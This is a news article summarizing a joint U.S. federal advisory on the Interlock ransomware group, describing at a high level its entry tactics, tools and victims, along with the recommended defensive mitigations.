Four major U.S. agencies have issued a joint cybersecurity alert warning about the escalating threat posed by the Interlock ransomware operation, which has increasingly targeted businesses, healthcare providers, and critical infrastructure entities across North America and Europe. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released the alert Tuesday as part of the #StopRansomware initiative. The agencies emphasized Interlock’s rapid evolution and its focus on high-impact sectors, particularly healthcare.
According to the advisory, Interlock emerged in September 2024 and has since launched financially motivated ransomware campaigns. The group employs a double-extortion model that involves both encrypting the victim’s system and stealing data, threatening to publish the stolen files if a ransom is not paid.
The gang does not include ransom demands in its initial notes. Instead, victims are given a unique code and directed to a .onion URL on the Tor network, where ransom negotiations take place.
Federal investigators say Interlock actors are opportunistic rather than targeting specific industries. Still, healthcare organizations have been frequent victims. Among the most high-profile victims are Kettering Health, a major Ohio-based healthcare system, and Fortune 500 kidney care company DaVita.
How Interlock gains entry
The FBI described Interlock’s initial tactics as “uncommon” among ransomware groups, citing drive-by downloads from compromised but otherwise legitimate websites. In these cases, the attackers disguise malicious payloads as fake updates for Google Chrome or Microsoft Edge.
Interlock also uses social engineering methods. One such tactic involves “ClickFix,” which deceives users into executing malicious code under the pretense of fixing a system error. A variation called “FileFix” uses native Windows elements to deploy malware, including remote access trojans (RATs), while evading security detection.
Once inside a system, Interlock deploys tools like Interlock RAT and NodeSnake RAT to maintain control, communicate with command-and-control (C2) servers, and execute further attacks. They also use PowerShell scripts to download credential-stealing malware, such as cht.exe and klg.dll, which capture usernames, passwords, and keystrokes. These credentials are then used for lateral movement across networks and can aid in escalating privileges through techniques such as Kerberoasting.
To extract data from cloud environments, the group exploits legitimate tools including Azure Storage Explorer and AzCopy. On Linux systems, Interlock has been observed deploying a rare ELF encryptor based FreeBSD, diverging from the more commonly seen VMware ESXi-focused ransomware payloads.
Protecting against Interlock attacks
To reduce the risk and impact of an Interlock ransomware attack, the federal advisory urges organizations to take the following steps:
- Implement DNS filtering to block access to malicious websites
- Use web application firewalls to filter harmful traffic
- Keep systems and software updated and patched
- Enforce multifactor authentication (MFA) for all accounts
- Segment networks to contain threats and prevent lateral movement
- Train employees to identify phishing and social engineering
- Maintain secure, offline, and immutable backups of critical data
For a full list of mitigations and to access free cybersecurity resources, organizations are advised to visit stopransomware.gov. If your organization has been affected by ransomware or suspects malicious activity, contact your local FBI field office or report to CISA via the agency’s Incident Reporting System.
Curious how a customer support portal became ground zero for a global data leak? Explore our full report on Dell’s breach and what World_Leaks is claiming.
